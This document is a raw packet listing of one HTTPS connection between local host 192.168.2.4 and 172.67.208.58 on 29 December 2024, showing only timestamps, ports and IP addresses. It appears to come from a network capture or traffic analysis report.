Dec 29, 2024 17:56:07.561784983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.561822891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.570435047 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.570449114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.570487022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.570492983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.570502043 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.570529938 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.577620983 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.577636003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.577681065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.577687025 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.577729940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.585832119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.585846901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.585890055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.585896969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.585932970 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.593961954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.593976974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.594014883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.594022036 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.594033003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.594062090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.749914885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.749933958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.750020981 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.750034094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.750067949 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.750087023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.757052898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.757067919 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.757136106 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.757143021 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.757181883 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.765351057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.765364885 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.765429974 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.765436888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.765476942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.773392916 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.773407936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.773471117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.773477077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.773515940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.781066895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.781080961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.781143904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.781148911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.781188011 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.789263010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.789288998 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.789452076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.789460897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.789505005 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.796457052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.796471119 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.796530962 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.796560049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.796602964 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.804677963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.804692984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.804770947 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.804779053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.804819107 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.960598946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.960617065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.960671902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.960686922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.960725069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.967739105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.967752934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.967808008 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.967814922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.967845917 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.975862026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.975878000 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.975939989 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.975945950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.975985050 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.984102011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.984116077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.984177113 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.984183073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.984347105 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.991724968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.991739035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.991803885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.991808891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.991842031 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:07.999969959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:07.999984980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.000076056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.000082016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.000134945 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.007143974 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.007158995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.007213116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.007219076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.007258892 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.015259027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.015273094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.015340090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.015345097 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.015383959 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.171268940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.171289921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.171350956 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.171370029 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.171411991 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.178385973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.178400040 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.178472042 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.178481102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.178520918 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.186683893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.186698914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.186767101 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.186774015 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.186811924 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.194766998 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.194793940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.194835901 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.194842100 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.194869995 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.194881916 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.202522993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.202553034 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.202586889 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.202591896 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.202619076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.202632904 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.210591078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.210604906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.210663080 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.210669041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.210707903 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.217847109 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.217861891 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.217928886 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.217936039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.217973948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.226072073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.226141930 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.226306915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.226367950 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.381855011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.381870031 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.382036924 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.382045984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.382091045 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.390068054 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.390083075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.390144110 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.390150070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.390186071 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.397239923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.397255898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.397322893 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.397327900 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.397367954 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.405353069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.405366898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.405421972 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.405430079 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.405469894 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.413105965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.413119078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.413167953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.413173914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.413199902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.413213968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.418961048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.419012070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.419028997 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.419035912 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.419068098 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.419083118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.421221018 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.421269894 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.429457903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.429472923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.429541111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.429547071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.435332060 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.435370922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.435406923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.435412884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.435431957 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.435453892 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.591274977 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.591296911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.591339111 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.591348886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.591372013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.591392994 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.598376989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.598392010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.598479986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.598485947 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.598522902 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.606553078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.606566906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.606606007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.606611967 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.606636047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.606648922 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.614753962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.614769936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.614813089 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.614820957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.614857912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.622355938 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.622370005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.622425079 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.622430086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.622467041 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.630594969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.630609035 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.630652905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.630659103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.630701065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.637751102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.637765884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.637816906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.637824059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.637859106 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.645864964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.645878077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.645920038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.645925999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:08.645946980 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:08.645966053 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.277515888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.277528048 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.277575016 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.277609110 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.277630091 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.277652025 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.277676105 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.278532982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.278548002 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.278604984 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.278611898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.278652906 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.279011011 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.279026985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.279097080 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.279103041 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.279156923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.279951096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.279964924 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.280019045 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.280025005 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.280066013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.281769037 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.281784058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.281814098 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.281831980 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.281836987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.281867027 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.281894922 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.282730103 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.282764912 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.282783985 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.282789946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.282825947 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.283629894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.283644915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.283667088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.283679008 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.283683062 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.283741951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.284774065 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.397484064 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.397500038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.397660017 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.397672892 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.397717953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.404567003 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.404583931 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.404652119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.404658079 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.404695988 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.412727118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.412741899 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.412836075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.412843943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.412887096 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.420941114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.420960903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.421017885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.421025038 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.421066999 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.428172112 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.428188086 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.428278923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.428292990 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.428333044 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.436852932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.436871052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.436944962 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.436954975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.436995983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.443957090 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.443972111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.444053888 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.444061995 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.444101095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.452116013 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.452131987 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.452208996 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.452217102 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.452256918 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.460366964 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.460383892 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.460438013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.460448980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.460473061 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.460491896 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.467983961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.467999935 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.468070984 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.468077898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.468120098 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.476218939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.476285934 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.476541042 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.476596117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.483356953 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.483371019 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.483432055 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.483438969 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.483483076 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.491525888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.491540909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.491600990 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.491607904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.491647005 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.499203920 CET	443	49758	172.67.208.58	192.168.2.4
